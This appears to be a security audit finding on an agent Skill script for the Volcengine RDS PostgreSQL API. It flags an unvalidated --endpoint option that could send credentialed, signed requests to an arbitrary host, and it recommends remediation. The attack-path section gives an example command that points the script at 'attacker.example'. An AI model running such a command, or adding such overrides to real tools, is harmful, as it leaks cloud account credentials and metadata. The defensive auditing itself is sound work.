T09 · Insecure Skill Coding Practices
- Location
scripts/call_rds_postgresql.py:70- Finding
Unrestricted API Endpoint Allows Credentialed Requests to an Attacker-Controlled Host
- Content
View full analysis
Vulnerability Details
File Location:
scripts/call_rds_postgresql.py, lines 70-73 and 399-400
Vulnerability Type: Unrestricted credentialed API endpoint override
Risk Level: MediumVulnerable Code
python configuration.region = self.region if self.endpoint: configuration.host = self.endpoint return RDSPOSTGRESQLApi(The endpoint is populated from an unrestricted command-line argument:
python parser.add_argument("--endpoint", dest="endpoint", help="API 端点(可选)") parser.add_argument(Technical Analysis
The command-line interface permits callers to replace the RDS PostgreSQL SDK host with an arbitrary value. No validation restricts the endpoint to HTTPS, official Volcengine domains, approved ports, or a predefined allowlist.
The client loads
VOLCENGINE_ACCESS_KEYandVOLCENGINE_SECRET_KEYbefore constructing the SDK client. Requests sent through the overridden endpoint may therefore contain the access-key identifier, signed authorization headers, timestamps, resource identifiers, query parameters, and other cloud-account metadata.The secret key is not explicitly transmitted by this code, but an attacker-controlled server can capture signed requests and sensitive operational metadata. Replay feasibility and scope depend on the SDK signature construction, request timestamps, canonical host handling, and server-side replay protections.
This option is also absent from the documented interface in
SKILL.md, so the implementation exposes a security-sensitive capability beyond the declared operational behavior.Attack Path
- An attacker persuades the user or agent to execute the Skill with an endpoint such as:
bash uv run ./scripts/call_rds_postgresql.py \ --endpoint https://attacker.example \ list-instances - The script reads the user's Volcengine access key and secret key from the process environment.
- The SDK constructs a ...[truncated 1076 chars]
- An attacker persuades the user or agent to execute the Skill with an endpoint such as:
- Remediation
View remediation
Remediation Suggestions
- Remove the
--endpointoption if custom API endpoints are not operationally required. - If custom endpoints are necessary, parse them with a standards-compliant URL parser and require:
- The
httpsscheme. - A hostname from a strict allowlist of official Volcengine API domains.
- No embedded username or password.
- No IP literals, localhost addresses, private-network destinations, or nonstandard ports.
- No URL fragments or unexpected path components.
- The
- Disable cross-origin redirects or verify every redirect destination against the same allowlist.
- Keep production endpoint overrides behind an explicit administrative configuration rather than accepting natural-language-derived command-line input.
- Add automated tests confirming that HTTP URLs, attacker domains, loopback addresses, private IP addresses, malformed hosts, and redirecting endpoints are rejected.
- Document any approved endpoint customization and warn that authenticated SDK traffic must never be sent to an untrusted server.
- Remove the
